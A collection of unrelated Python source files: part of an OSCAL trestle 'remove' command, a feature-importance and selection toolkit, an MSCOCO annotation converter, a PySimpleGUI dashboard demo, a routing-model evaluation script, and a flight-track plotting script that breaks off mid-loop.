return CmdReturnCodes.COMMAND_ERROR.value
try:
parent_model, parent_alias = ModelUtils.get_relative_model_type(relative_path)
except Exception as err:
logger.error(f'Remove failed (fs.get_relative_model_type()): {err}')
return CmdReturnCodes.COMMAND_ERROR.value
try:
parent_object = parent_model.oscal_read(file_path)
except Exception as err:
logger.error(f'Remove failed (parent_model.oscal_read()): {err}')
return CmdReturnCodes.COMMAND_ERROR.value
parent_element = Element(parent_object, parent_alias)
add_plan = Plan()
# Do _remove for each element_path specified in args
element_paths: List[str] = str(args_dict[const.ARG_ELEMENT]).split(',')
for elm_path_str in element_paths:
element_path = ElementPath(elm_path_str)
try:
remove_action, parent_element = self.remove(element_path, parent_element)
except TrestleError as err:
logger.debug(f'self.remove() failed: {err}')
logger.error(f'Remove failed (self.remove()): {err}')
return CmdReturnCodes.COMMAND_ERROR.value
add_plan.add_action(remove_action)
create_action = CreatePathAction(file_path, True)
write_action = WriteFileAction(file_path, parent_element, FileContentType.to_content_type(file_path.suffix))
add_plan.add_action(remove_action)
add_plan.add_action(create_action)
add_plan.add_action(write_action)
try:
add_plan.execute()
except TrestleError as err:
logger.debug(f'Remove failed at execute(): {err}')
logger.error(f'Remove failed (execute()): {err}')
return CmdReturnCodes.COMMAND_ERROR.value
return CmdReturnCodes.SUCCESS.value
except TrestleError as e:
logger.debug(traceback.format_exc())
logger.error(f'Error while removing OSCAL component: {e}')
return CmdReturnCodes.COMMAND_ERROR.value
except Exception as e: # pragma: no cover
logger.debug(traceback.format_exc())
logger.error(f'Unexpected error while removing OSCAL component: {e}')
return CmdReturnCodes.UNKNOWN_ERROR.value
@classmethod
def remove(cls, element_path: ElementPath, parent_element: Element) -> Tuple[RemoveAction, Element]:
"""For the element_path, remove a model from the parent_element of a given parent_model.
First we check if there is an existing element at that path
If not, we complain.
Then we set up an action plan to update the model (specified by file_path) in memory,
return the action and return the parent_element.
LIMITATIONS:
1. This does not remove elements of a list or dict. Instead, the entire list or dict is removed.
2. This cannot remove arbitrarily named elements that are not specified in the schema.
For example, "responsible-parties" contains named elements, e.g., "organisation". The tool will not
remove the "organisation" as it is not in the schema, but one can remove its elements, e.g., "party-uuids".
"""
element_path_list = element_path.get_full_path_parts()
if '*' in element_path_list:
raise err.TrestleError('trestle remove does not support Wildcard element path.')
deleting_element = parent_element.get_at(element_path)
if deleting_element is not None:
# The element already exists
if type(deleting_element) is list:
logger.warning(
'Warning: trestle remove does not support removing elements of a list: '
'this removes the entire list'
)
elif type(deleting_element) is dict:
logger.warning(
'Warning: trestle remove does not support removing dict elements: '
'this removes the entire dict element'
)
else:
raise err.TrestleError(f'Bad element path: {str(element_path)}')
remove_action = RemoveAction(parent_element, element_path)
return remove_action, parent_element
|
the-stack_0_19798 | import numpy as np
import pandas as pd
import shap
import matplotlib.pyplot as plt
from sklearn.base import clone
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.metrics import r2_score, mean_squared_error, log_loss
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier
# data proprocessing
def load_data(Path):
data = pd.read_csv(Path, index_col=0)
col = 'diagnosis'
data[col] = data[col].astype('category').cat.as_ordered()
encoder = data[col].cat.categories
data[col] = data[col].cat.codes
data = data.drop(columns=['Unnamed: 32'])
return data
def split_target(df, target):
Y = df[target].values
X = df.drop(columns=[target])
return X, Y
def train_val_split(df, ratio):
train, val = train_test_split(df, train_size=ratio, shuffle=True)
return train, val
def label_encoding_with_NAs(train, val, col):
train[col] = train[col].astype('category').cat.as_ordered()
encoder = train[col].cat.categories
train[col] = train[col].cat.codes + 1
val[col] = pd.Categorical(val[col], categories=encoder, ordered=True)
val[col] = val[col].cat.codes + 1
# Data-based importance strategies
def top_rank(df, target, n=None, ascending=False, method='spearman'):
"""
Calculate first / last N correlation with target
This method is measuring single-feature relevance importance and works well for independent features
But suffers in the presence of codependent features.
pearson : standard correlation coefficient
kendall : Kendall Tau correlation coefficient
spearman : Spearman rank correlation
:return:
"""
if not n:
n = len(df.columns)
if method == 'PCA':
scaler = StandardScaler()
feas = [col for col in df.columns if col != target]
X = scaler.fit_transform(df.loc[:, feas])
pca = PCA(n_components=0.9)
pca.fit(X)
featimp = {feas[i]:abs(pca.components_[0])[i] for i in range(len(feas))}
feas = sorted(featimp, key=featimp.get, reverse=True)[:n]
vals = [featimp[fea] for fea in feas]
else:
feas = list(abs(df.corr(method=method)[target]).sort_values(ascending=ascending).index[1:n+1])
vals = list(abs(df.corr(method=method)[target]).sort_values(ascending=ascending))[1:n+1]
return feas, vals
def mRMR(df, target, mode='spearman', n=None, info=False):
if not n:
n = len(df.columns)
mrmr = dict()
# use different mode to calculate correaltion
feas, imps = top_rank(df, target, method=mode)
corr = dict([(fea, imp) for imp, fea in zip(imps, feas)])
selected_feat = [feas[0]]
for i in range(len(feas)):
rest_feat = [col for col in feas if col not in selected_feat]
if not len(rest_feat):
break
candi_mrmr = []
for fi in rest_feat:
redundancy = 0
relevance = corr[fi]
for fj in selected_feat:
feas, imps = top_rank(df.drop(columns=target), fj, method=mode)
corr_fj = dict([(fea, imp) for imp, fea in zip(imps, feas)])
redundancy += corr_fj[fi]
redundancy /= len(selected_feat)
candi_mrmr.append(relevance - redundancy)
max_feature = rest_feat[np.argmax(candi_mrmr)]
mrmr[max_feature] = np.max(candi_mrmr)
if info:
print(f'{i+1} iteration, selected {max_feature} feature with mRMR value = {mrmr[max_feature]:.3f}')
selected_feat.append(max_feature)
feat_imp = pd.Series(mrmr.values(), index=mrmr.keys()).sort_values(ascending=False)
return feat_imp.values[:n], feat_imp.index[:n]
# Model-based importance strategies
def permutation_importance(X_train, y_train, X_valid, y_valid, mode='R'):
model = rf_model(X_train, y_train, mode)
if mode == 'R':
baseline = r2_score(y_valid, model.predict(X_valid))
else:
baseline = log_loss(y_valid, model.predict_proba(X_valid))
imp = []
for col in X_valid.columns:
save = X_valid[col].copy()
X_valid[col] = np.random.permutation(X_valid[col])
if mode == 'R':
m = r2_score(y_valid, model.predict(X_valid))
else:
m = log_loss(y_valid, model.predict_proba(X_valid))
X_valid[col] = save
imp.append(baseline - m)
feat_imp = pd.Series(imp, index=X_valid.columns).sort_values(ascending=False)
return feat_imp.values, feat_imp.index
def dropcol_importances(X_train, y_train, X_valid, y_valid, mode='R'):
model = rf_model(X_train, y_train, mode)
baseline = model.oob_score_
imp = []
for col in X_train.columns:
X_train_ = X_train.drop(col, axis=1)
X_valid_ = X_valid.drop(col, axis=1)
model_ = clone(model)
model_.fit(X_train_, y_train)
m = model_.oob_score_
imp.append(baseline - m)
feat_imp = pd.Series(imp, index=X_valid.columns).sort_values(ascending=False)
return feat_imp.values, feat_imp.index
def shap_importances(x_train, y_train, x_val, y_val):
rf = rf_model(x_train, y_train, mode='R')
shap_values = shap.TreeExplainer(rf, data=x_train).shap_values(X=x_val, y=y_val, check_additivity=False)
imp = np.mean(np.abs(shap_values), axis=0)
return imp, x_val.columns
def rf_model(x_train, y_train, mode='R'):
hyper = {'min_samples_leaf':80, 'max_features':0.5, 'max_depth':15}
if mode == 'R':
rf = RandomForestRegressor(n_estimators=50,
min_samples_leaf=hyper['min_samples_leaf'],
max_features=hyper['max_features'],
max_depth=hyper['max_depth'],
oob_score=True,
n_jobs=-1)
else:
rf = RandomForestClassifier(n_estimators=50,
min_samples_leaf=hyper['min_samples_leaf'],
max_features=hyper['max_features'],
max_depth=hyper['max_depth'],
oob_score=True,
n_jobs=-1)
rf.fit(x_train, y_train)
return rf
# Visualizing importances
def plot_feature_importances(importances, columns, title, n=None, size=(15, 15), show_values=False, show_var=[0]):
if not n:
n = len(columns)
n_importances = pd.Series(importances, index=columns).sort_values(ascending=True)[-n:]
fig, ax = plt.subplots(figsize=size)
if not any(show_var):
n_importances.plot.barh(color='#4daf4a')
else:
ax.barh(n_importances.index,
n_importances,
xerr=sorted(show_var), color='#4daf4a')
if show_values:
for i, bar in enumerate(ax.patches):
if bar.get_width() < 0:
p = bar.get_width()-0.02
else:
p = bar.get_width()+0.005
ax.text(p, bar.get_y()+0.15, str(round((n_importances[i]), 2)), fontsize=10, color='black')
ax.set_title("Feature Importances - " + title, fontsize=20, loc='left', pad=30)
ax.set_ylabel("Feature")
ax.xaxis.set_ticks_position('none')
ax.yaxis.set_ticks_position('none')
plt.ylim(-1, n)
fig.tight_layout()
plt.grid()
# Comparing strategies
def Top_k_loss(x_train, y_train, x_val, y_val, feat, imp, k=15, metric=log_loss):
model = rf_model(x_train, y_train, mode='C')
loss_list = []
n_imp = pd.Series(imp, index=feat).sort_values(ascending=False)[:k+1]
for i in range(1, k+1):
model_ = clone(model)
features = n_imp.index[:i]
model_.fit(x_train.loc[:, features], y_train)
pred = model_.predict_proba(x_val.loc[:, features])
loss = metric(y_val, pred)
loss_list.append(loss)
return loss_list
def compare_Top_k(data, target, k=10):
train, val = train_val_split(data, 0.8)
x_train, y_train = split_target(train, target)
x_val, y_val = split_target(val, target)
feat_spearman, imp_spearman = top_rank(data, target, method='spearman')
loss_spearman = Top_k_loss(x_train, y_train, x_val, y_val, feat_spearman, imp_spearman, k=k)
feat_pearson, imp_pearson = top_rank(data, target, method='pearson')
loss_pearson = Top_k_loss(x_train, y_train, x_val, y_val, feat_pearson, imp_pearson, k=k)
feat_kendall, imp_kendall = top_rank(data, target, method='kendall')
loss_kendall = Top_k_loss(x_train, y_train, x_val, y_val, feat_kendall, imp_kendall, k=k)
feat_pca, imp_pca = top_rank(data, target, method='PCA')
loss_pca = Top_k_loss(x_train, y_train, x_val, y_val, feat_pca, imp_pca)
imp_perm, feat_perm = permutation_importance(x_train, y_train, x_val, y_val, mode='R')
loss_perm = Top_k_loss(x_train, y_train, x_val, y_val, feat_perm, imp_perm, k=k)
imp_drop, feat_drop = dropcol_importances(x_train, y_train, x_val, y_val, mode='R')
loss_drop = Top_k_loss(x_train, y_train, x_val, y_val, feat_drop, imp_drop, k=k)
imp_shap, feat_shap = shap_importances(x_train, y_train, x_val, y_val)
loss_shap = Top_k_loss(x_train, y_train, x_val, y_val, feat_shap, imp_shap, k=k)
imp_mrmr, feat_mrmr = mRMR(data, target)
loss_mrmr = Top_k_loss(x_train, y_train, x_val, y_val, feat_mrmr, imp_mrmr, k=k)
fig = plt.figure(figsize=(15,15))
ax = plt.axes()
ax.grid(False)
x, markers = range(1, k+1), ['o', '8', 's', 'p', '+', '*', 'h', 'v']
plt.plot(x, loss_spearman, '#BA5645', marker=markers[0], label='Spearman')
plt.plot(x, loss_pearson, '#BA8949', marker=markers[1], label='Pearson')
plt.plot(x, loss_kendall, '#8DBA49', marker=markers[2], label='Kendall')
plt.plot(x, loss_pca, '#49A7BA', marker=markers[3], label='PCA')
plt.plot(x, loss_perm, '#6E49BA', marker=markers[4], label='Permutation')
plt.plot(x, loss_drop, '#BA49A0', marker=markers[5], label='Drop Column')
plt.plot(x, loss_shap, '#878784', marker=markers[6], label='Shap')
plt.plot(x, loss_mrmr, '#000000', marker=markers[7], label='mRMR')
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels)
ax.set_ylabel('Log Loss', fontsize=10)
ax.set_xlabel('Top K selected features', fontsize=10)
plt.show()
# Automatic feature selection
def auto_featSelection(data, target, mode='permutation', metric=log_loss):
train, val = train_val_split(data, 0.8)
x_train, y_train = split_target(train, target)
x_val, y_val = split_target(val, target)
model = rf_model(x_train, y_train, mode='C')
model_ = clone(model)
model_.fit(x_train, y_train)
pred = model_.predict_proba(x_val)
val_loss = metric(y_val, pred)
# choose mode for featimp
if mode == 'spearman':
feat, imp = top_rank(data, target, method='spearman')
elif mode == 'pearson':
feat, imp = top_rank(data, target, method='pearson')
elif mode == 'kendall':
feat, imp = top_rank(data, target, method='kendall')
elif mode == 'pca':
feat, imp = top_rank(data, target, method='PCA')
elif mode == 'permutation':
imp, feat = permutation_importance(x_train, y_train, x_val, y_val, mode='R')
elif mode == 'dropcol':
imp, feat = dropcol_importances(x_train, y_train, x_val, y_val, mode='R')
elif mode == 'shap':
imp, feat = shap_importances(x_train, y_train, x_val, y_val)
elif mode == 'mrmr':
imp, feat = mRMR(data, target)
else:
print('Wrong mode name')
val_loss_new = 0
i = 0
while True:
i += 1
drop_feat = feat[-i:]
model_ = clone(model)
x_train_drop = x_train.drop(columns=drop_feat)
x_val_drop = x_val.drop(columns=drop_feat)
model_.fit(x_train_drop, y_train)
pred_new = model_.predict_proba(x_val_drop)
val_loss_new = metric(y_val, pred_new)
# if worse, use the previos one
if val_loss_new > val_loss:
if i == 1:
return model_, []
drop_feat = feat[-i+1:]
model_ = clone(model)
x_train_drop = x_train.drop(columns=drop_feat)
x_val_drop = x_val.drop(columns=drop_feat)
model_.fit(x_train_drop, y_train)
break
val_loss = val_loss_new
return model_, drop_feat
# Variance and empirical p-values for feature importances
def feature_variance(data, target, mode='shap'):
"""
Calculate standard deviation using booststraping
"""
train, val = train_val_split(data, 0.8)
x_train, y_train = split_target(train, target)
n = 100
imp_n = []
for i in range(n):
idx = np.random.choice(range(val.shape[0]), size=val.shape[0], replace=True)
x_new, y_new = split_target(val.iloc[idx, :], target)
if mode == 'shap':
imp, _ = shap_importances(x_train, y_train, x_new, y_new)
elif mode == 'permutation':
imp, _ = permutation_importance(x_train, y_train, x_new, y_new)
elif mode == 'dropcol':
imp, _ = dropcol_importances(x_train, y_train, x_new, y_new)
imp_n.append(imp)
return np.std(np.array(imp_n), axis=0)
def feature_pvalue(data, target, mode='shap', metric=log_loss):
train, val = train_val_split(data, 0.8)
x_train, y_train = split_target(train, target)
x_val, y_val = split_target(val, target)
n = 100
n_imp = []
if mode == 'shap':
baseline, feas = shap_importances(x_train, y_train, x_val, y_val)
elif mode == 'permutation':
baseline, feas = permutation_importance(x_train, y_train, x_val, y_val)
elif mode == 'dropcol':
baseline, feas = dropcol_importances(x_train, y_train, x_val, y_val)
else:
print('Wrong mode name')
return
baseline = baseline / np.sum(baseline)
for i in range(n):
idx = np.random.choice(range(val.shape[0]), size=val.shape[0], replace=True)
x_new, y_new = split_target(val.iloc[idx, :], target)
if mode == 'shap':
imp, _ = shap_importances(x_train, y_train, x_new, y_new)
elif mode == 'permutation':
imp, _ = permutation_importance(x_train, y_train, x_new, y_new)
elif mode == 'dropcol':
imp, _ = dropcol_importances(x_train, y_train, x_new, y_new)
imp = imp / np.sum(imp)
n_imp.append(imp)
diff = baseline - n_imp
p_values = np.sum(diff <= 0, axis=0) / n
return p_values, baseline, np.array(n_imp), feas
def pvalue_hist(p_values, baseline, imps, feas, k=0, size=(14,8), alpha=0.05):
"""
Create a null distribution histogram for given top kth feature
"""
list_plots = []
fig, ax = plt.subplots(figsize=size)
plt.hist(imps[:, k], bins='auto')
ax.axvline(x=baseline[k], c='red')
if p_values[k] < alpha:
plt.title(f"Null Distributions Histogram for significant feature: {feas[k]} with p-value: {p_values[k]}")
else:
plt.title(f"Null Distributions Histogram for insignificant feature: {feas[k]} with p-value: {p_values[k]}")
plt.show() |
the-stack_0_19799 | import json
import os
def save_json(load_type):
# Define path to mscoco images data
base_img_path = '/path/to/mscoco/images/' ###### REPLACE with path to dataset
base_annot_path = '/path/to/mscoco/annotations/'###### REPLACE with path to dataset
f = open(os.path.join(base_annot_path,'instances_'+load_type+'2014.json'),'r')
x = json.load(f)
f.close()
imgids = [[idx['id'], idx['file_name'], idx['width'], idx['height']] for idx in x['images']]
dd = {}
for idx in imgids:
frame_dict = dict(objs=[], img_path=idx[1])
dd[idx[0]] = dict(frames=[frame_dict], base_path=os.path.join(base_img_path,load_type+'2014'), frame_size=[idx[2],idx[3]])
print('finished imgids')
count = 0
for annot in x['annotations']:
image_id = annot['image_id']
trackid = len(dd[image_id]['frames'][0]['objs'])
cat = annot['category_id']
bbox = annot['bbox'] # [x,y,width,height]
bbox = [bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]] # [xmin, ymin, xmax, ymax]
iscrowd=annot['iscrowd']
obj_info = dict(trackid=trackid, c=cat, iscrowd=iscrowd, bbox=bbox)
dd[image_id]['frames'][0]['objs'].append(obj_info)
count+=1
if count%1000==0:
print(count)
writef = open('mscoco_'+load_type+'.json', 'w')
json.dump(dd.values(), writef)
writef.close()
save_json('train')
save_json('val')
|
the-stack_0_19801 | import PySimpleGUI as sg
"""
Dashboard using blocks of information.
Copyright 2020 PySimpleGUI.org
"""
theme_dict = {'BACKGROUND': '#2B475D',
'TEXT': '#FFFFFF',
'INPUT': '#F2EFE8',
'TEXT_INPUT': '#000000',
'SCROLL': '#F2EFE8',
'BUTTON': ('#000000', '#C2D4D8'),
'PROGRESS': ('#FFFFFF', '#C7D5E0'),
'BORDER': 1, 'SLIDER_DEPTH': 0, 'PROGRESS_DEPTH': 0}
# sg.theme_add_new('Dashboard', theme_dict) # if using 4.20.0.1+
sg.LOOK_AND_FEEL_TABLE['Dashboard'] = theme_dict
sg.theme('Dashboard')
BORDER_COLOR = '#C7D5E0'
DARK_HEADER_COLOR = '#1B2838'
BPAD_TOP = ((20, 20), (20, 10))
BPAD_LEFT = ((20, 10), (0, 10))
BPAD_LEFT_INSIDE = (0, 10)
BPAD_RIGHT = ((10, 20), (10, 20))
top_banner = [[sg.Text('Dashboard' + ' '*64, font='Any 20', background_color=DARK_HEADER_COLOR),
sg.Text('Tuesday 9 June 2020', font='Any 20', background_color=DARK_HEADER_COLOR)]]
top = [[sg.Text('The Weather Will Go Here', size=(50, 1), justification='c', pad=BPAD_TOP, font='Any 20')],
[sg.T(f'{i*25}-{i*34}') for i in range(7)], ]
block_3 = [[sg.Text('Block 3', font='Any 20')],
[sg.Input(), sg.Text('Some Text')],
[sg.Button('Go'), sg.Button('Exit')]]
block_2 = [[sg.Text('Block 2', font='Any 20')],
[sg.T('This is some random text')],
[sg.Image(data=sg.DEFAULT_BASE64_ICON)]]
block_4 = [[sg.Text('Block 4', font='Any 20')],
[sg.T('This is some random text')],
[sg.T('This is some random text')],
[sg.T('This is some random text')],
[sg.T('This is some random text')]]
layout = [[sg.Column(top_banner, size=(960, 60), pad=(0, 0), background_color=DARK_HEADER_COLOR)],
[sg.Column(top, size=(920, 90), pad=BPAD_TOP)],
[sg.Column([[sg.Column(block_2, size=(450, 150), pad=BPAD_LEFT_INSIDE)],
[sg.Column(block_3, size=(450, 150), pad=BPAD_LEFT_INSIDE)]], pad=BPAD_LEFT, background_color=BORDER_COLOR),
sg.Column(block_4, size=(450, 320), pad=BPAD_RIGHT)]]
window = sg.Window('Dashboard PySimpleGUI-Style', layout, margins=(0, 0),
background_color=BORDER_COLOR, no_titlebar=True, grab_anywhere=True)
while True: # Event Loop
event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Exit':
break
window.close()
|
the-stack_0_19802 | import math
import torch
import os
import argparse
import numpy as np
import itertools
from tqdm import tqdm
from utils import load_model, move_to
from utils.data_utils import save_dataset
from torch.utils.data import DataLoader
import time
from datetime import timedelta
from utils.functions import parse_softmax_temperature
mp = torch.multiprocessing.get_context('spawn')
import warnings
warnings.filterwarnings("ignore", message="indexing with dtype torch.uint8 is now deprecated, please use a dtype torch.bool instead.")
def get_best(sequences, cost, ids=None, batch_size=None):
"""
Ids contains [0, 0, 0, 1, 1, 2, ..., n, n, n] if 3 solutions found for 0th instance, 2 for 1st, etc
:param sequences:
:param lengths:
:param ids:
:return: list with n sequences and list with n lengths of solutions
"""
if ids is None:
idx = cost.argmin()
return sequences[idx:idx+1, ...], cost[idx:idx+1, ...]
splits = np.hstack([0, np.where(ids[:-1] != ids[1:])[0] + 1])
mincosts = np.minimum.reduceat(cost, splits)
group_lengths = np.diff(np.hstack([splits, len(ids)]))
all_argmin = np.flatnonzero(np.repeat(mincosts, group_lengths) == cost)
result = np.full(len(group_lengths) if batch_size is None else batch_size, -1, dtype=int)
result[ids[all_argmin[::-1]]] = all_argmin[::-1]
return [sequences[i] if i >= 0 else None for i in result], [cost[i] if i >= 0 else math.inf for i in result]
def eval_dataset_mp(args):
(dataset_path, width, softmax_temp, opts, i, num_processes) = args
model, _ = load_model(opts.model)
val_size = opts.val_size // num_processes
dataset = model.problem.make_dataset(filename=dataset_path, num_samples=val_size, offset=opts.offset + val_size * i)
device = torch.device("cuda:{}".format(i))
return _eval_dataset(model, dataset, width, softmax_temp, opts, device)
def eval_dataset(dataset_path, width, softmax_temp, opts):
# Even with multiprocessing, we load the model here since it contains the name where to write results
model, _ = load_model(opts.model)
use_cuda = torch.cuda.is_available() and not opts.no_cuda
model.use_cuda = use_cuda
if opts.multiprocessing:
assert use_cuda, "Can only do multiprocessing with cuda"
num_processes = torch.cuda.device_count()
assert opts.val_size % num_processes == 0
with mp.Pool(num_processes) as pool:
results = list(itertools.chain.from_iterable(pool.map(
eval_dataset_mp,
[(dataset_path, width, softmax_temp, opts, i, num_processes) for i in range(num_processes)]
)))
else:
device = torch.device("cuda:0" if use_cuda else "cpu")
dataset = model.problem.make_dataset(filename=dataset_path, num_samples=opts.val_size, offset=opts.offset)
results = _eval_dataset(model, dataset, width, softmax_temp, opts, device)
# This is parallelism, even if we use multiprocessing (we report as if we did not use multiprocessing, e.g. 1 GPU)
parallelism = opts.eval_batch_size
costs, tours, durations = zip(*results) # Not really costs since they should be negative
print("Average cost: {} +- {}".format(np.mean(costs), 2 * np.std(costs) / np.sqrt(len(costs))))
print("Average serial duration: {} +- {}".format(
np.mean(durations), 2 * np.std(durations) / np.sqrt(len(durations))))
print("Average parallel duration: {}".format(np.mean(durations) / parallelism))
print("Calculated total duration: {}".format(timedelta(seconds=int(np.sum(durations) / parallelism))))
dataset_basename, ext = os.path.splitext(os.path.split(dataset_path)[-1])
model_name = "_".join(os.path.normpath(os.path.splitext(opts.model)[0]).split(os.sep)[-2:])
if opts.o is None:
results_dir = os.path.join(opts.results_dir, model.problem.NAME, dataset_basename)
os.makedirs(results_dir, exist_ok=True)
out_file = os.path.join(results_dir, "{}-{}-{}{}-t{}-{}-{}{}".format(
dataset_basename, model_name,
opts.decode_strategy,
width if opts.decode_strategy != 'greedy' else '',
softmax_temp, opts.offset, opts.offset + len(costs), ext
))
else:
out_file = opts.o
assert opts.f or not os.path.isfile(
out_file), "File already exists! Try running with -f option to overwrite."
save_dataset((results, parallelism), out_file)
return costs, tours, durations
def _eval_dataset(model, dataset, width, softmax_temp, opts, device):
model.to(device)
model.eval()
model.set_decode_type(
"greedy" if opts.decode_strategy in ('bs', 'greedy') else "sampling",
temp=softmax_temp)
dataloader = DataLoader(dataset, batch_size=opts.eval_batch_size)
results = []
for batch in tqdm(dataloader, disable=opts.no_progress_bar, ascii=True):
if model.problem.NAME is "tspsl":
batch = move_to(batch["nodes_coord"], device)
else:
batch = move_to(batch, device)
start = time.time()
with torch.no_grad():
if opts.decode_strategy in ('sample', 'greedy'):
if opts.decode_strategy == 'greedy':
assert width == 0, "Do not set width when using greedy"
assert opts.eval_batch_size <= opts.max_calc_batch_size, \
"eval_batch_size should be smaller than calc batch size"
batch_rep = 1
iter_rep = 1
elif width * opts.eval_batch_size > opts.max_calc_batch_size:
assert opts.eval_batch_size == 1
assert width % opts.max_calc_batch_size == 0
batch_rep = opts.max_calc_batch_size
iter_rep = width // opts.max_calc_batch_size
else:
batch_rep = width
iter_rep = 1
assert batch_rep > 0
# This returns (batch_size, iter_rep shape)
sequences, costs = model.sample_many(batch, batch_rep=batch_rep, iter_rep=iter_rep)
batch_size = len(costs)
ids = torch.arange(batch_size, dtype=torch.int64, device=costs.device)
else:
assert opts.decode_strategy == 'bs'
cum_log_p, sequences, costs, ids, batch_size = model.beam_search(
batch, beam_size=width,
compress_mask=opts.compress_mask,
max_calc_batch_size=opts.max_calc_batch_size
)
if sequences is None:
sequences = [None] * batch_size
costs = [math.inf] * batch_size
else:
sequences, costs = get_best(
sequences.cpu().numpy(), costs.cpu().numpy(),
ids.cpu().numpy() if ids is not None else None,
batch_size
)
duration = time.time() - start
for seq, cost in zip(sequences, costs):
if model.problem.NAME in ("tsp", "tspsl"):
seq = seq.tolist() # No need to trim as all are same length
elif model.problem.NAME in ("cvrp", "sdvrp"):
seq = np.trim_zeros(seq).tolist() + [0] # Add depot
elif model.problem.NAME in ("op", "pctsp"):
seq = np.trim_zeros(seq) # We have the convention to exclude the depot
else:
assert False, "Unkown problem: {}".format(model.problem.NAME)
# Note VRP only
results.append((cost, seq, duration))
return results
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("datasets", nargs='+', help="Filename of the dataset(s) to evaluate")
parser.add_argument("-f", action='store_true', help="Set true to overwrite")
parser.add_argument("-o", default=None, help="Name of the results file to write")
parser.add_argument('--val_size', type=int, default=10000,
help='Number of instances used for reporting validation performance')
parser.add_argument('--offset', type=int, default=0,
help='Offset where to start in dataset (default 0)')
parser.add_argument('--eval_batch_size', type=int, default=1024,
help="Batch size to use during (baseline) evaluation")
parser.add_argument('--width', type=int, nargs='+',
help='Sizes of beam to use for beam search (or number of samples for sampling), '
'0 to disable (default), -1 for infinite')
parser.add_argument('--decode_strategy', type=str,
help='Beam search (bs), Sampling (sample) or Greedy (greedy)')
parser.add_argument('--softmax_temperature', type=parse_softmax_temperature, default=1,
help="Softmax temperature (sampling or bs)")
parser.add_argument('--model', type=str)
parser.add_argument('--no_cuda', action='store_true', help='Disable CUDA')
parser.add_argument('--no_progress_bar', action='store_true', help='Disable progress bar')
parser.add_argument('--compress_mask', action='store_true', help='Compress mask into long')
parser.add_argument('--max_calc_batch_size', type=int, default=10000, help='Size for subbatches')
parser.add_argument('--results_dir', default='results', help="Name of results directory")
parser.add_argument('--multiprocessing', action='store_true',
help='Use multiprocessing to parallelize over multiple GPUs')
opts = parser.parse_args()
assert opts.o is None or (len(opts.datasets) == 1 and len(opts.width) <= 1), \
"Cannot specify result filename with more than one dataset or more than one width"
widths = opts.width if opts.width is not None else [0]
for width in widths:
for dataset_path in opts.datasets:
eval_dataset(dataset_path, width, opts.softmax_temperature, opts)
|
the-stack_0_19804 | """
@function: analyzing data relying on visualization
@author: Tengyao Li
@date: 2018/09/11
@update: 2018/09/12
"""
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import pandas as pd
import time
from util.parameter import DATA_INPUT_PATH
# merge dataset for different hours
hour_limitation = 1 # limit the amount of dataset to merge
df = pd.DataFrame()
for hour in range(hour_limitation):
if hour < 10:
dfx = pd.read_csv(DATA_INPUT_PATH + '/states_2019-12-23-0%i.csv' % hour)
else:
dfx = pd.read_csv(DATA_INPUT_PATH + '/states_2019-12-23-%i.csv' % hour)
dfx.time = dfx.time.apply(lambda x: time.strftime("%H:%M:%S", time.localtime(x)))
df = df.append(dfx, ignore_index=True)
loop = 1 # limit the amount of flights
highest_altitude = df.baroaltitude.max() # used to limit the axis range
for icao in df.icao24.unique():
df_cruise = df.loc[df.icao24 == icao] # get the current flight route
# plot the flight track ( the point to get off is marked with circle)
fig0 = plt.figure()
fig0.add_subplot(1, 1, 1)
ax = Axes3D(fig0)
ax.plot(df_cruise.lat, df_cruise.lon, df_cruise.baroaltitude)
ax.scatter(df_cruise.iloc[0].lat, df_cruise.iloc[0].lon, df_cruise.iloc[0].baroaltitude, c='r', marker='>')
ax.set_xlabel("latitude")
ax.set_ylabel("longitude")
ax.set_zlabel("altitude")
ax.set_zlim(0, highest_altitude)
# plt.title("the track of flight: %s" % df_cruise.callsign.iloc[0])
# fig0.savefig('%s-track.eps' % df_cruise.callsign.iloc[0], format='eps')
# plot the relative attribute to improve analysis
fig1 = plt.figure()
fig1.add_subplot(2, 2, 1)
plt.plot(df_cruise.time, df_cruise.velocity, '-')
plt.xlabel("time")
plt.ylabel("velocity")
plt.title("(a)")
fig1.add_subplot(2, 2, 2)
plt.plot(df_cruise.time, df_cruise.heading, '-')
plt.xlabel("time")
plt.ylabel('heading')
plt.title("(b)")
fig1.add_subplot(2, 2, 3)
plt.plot(df_cruise.time, df_cruise.geoaltitude, '-')
plt.xlabel("time")
plt.ylabel('geoaltitude')
plt.title("(c)")
fig1.add_subplot(2, 2, 4)
plt.plot(df_cruise.time, df_cruise.vertrate, '-')
plt.xlabel("time")
plt.ylabel('vertrate')
plt.title("(d)")
# fig1.suptitle("Characteristic Analysis for flight - %s" % df_cruise.callsign.iloc[0])
# fig1.savefig('%s-characteristics.eps' % df_cruise.callsign.iloc[0], format='eps')
# # plot the neighbor airspace density
# time_range = 1 # control the cycle amount to analyze
# for i in range(time_range):
# fig2 = plt.figure()
# count = 1
# for t in df_cruise.time[20 * i:20 * (i + 1)]:
# fig2.add_subplot(4, 5, count)
#
# df_density = df.loc[df.time == t]
# plt.scatter(df_density.lat, df_density.lon)
# plt.plot(df_cruise.iloc[0].lat, df_cruise.iloc[0].lon, 'r+')
# plt.xlabel("latitude")
# plt.xlim(df_cruise.iloc[0].lat - 5, df_cruise.iloc[0].lat + 5)
# plt.ylabel("longitude")
# plt.ylim(df_cruise.iloc[0].lon - 5, df_cruise.iloc[0].lon + 5)
# plt.title("(%s)" % count)
# count += 1
# fig2.suptitle("spatial relevance analysis for flight - %s" % df_cruise.callsign.iloc[0])
# fig2.savefig('%s-density-%i-cycle.eps' % (df_cruise.callsign.iloc[0], i),format='eps',dpi=1000)
pieces = 1 # the record point
separation = 10 # time separation (time: pieces*seperation*10)
fig2 = plt.figure()
# plt.subplots_adjust(wspace=1, hspace=.3)
while pieces < 21:
df_density = df.loc[df.time == df_cruise.time.iloc[pieces * separation]]
fig2.add_subplot(4, 5, pieces)
plt.scatter(df_density.lat, df_density.lon)
plt.plot(df_cruise.iloc[0].lat, df_cruise.iloc[0].lon, 'r+')
if pieces > 14:
plt.xlabel("latitude")
plt.xlim(df_cruise.iloc[0].lat - 5, df_cruise.iloc[0].lat + 5)
plt.ylabel("longitude")
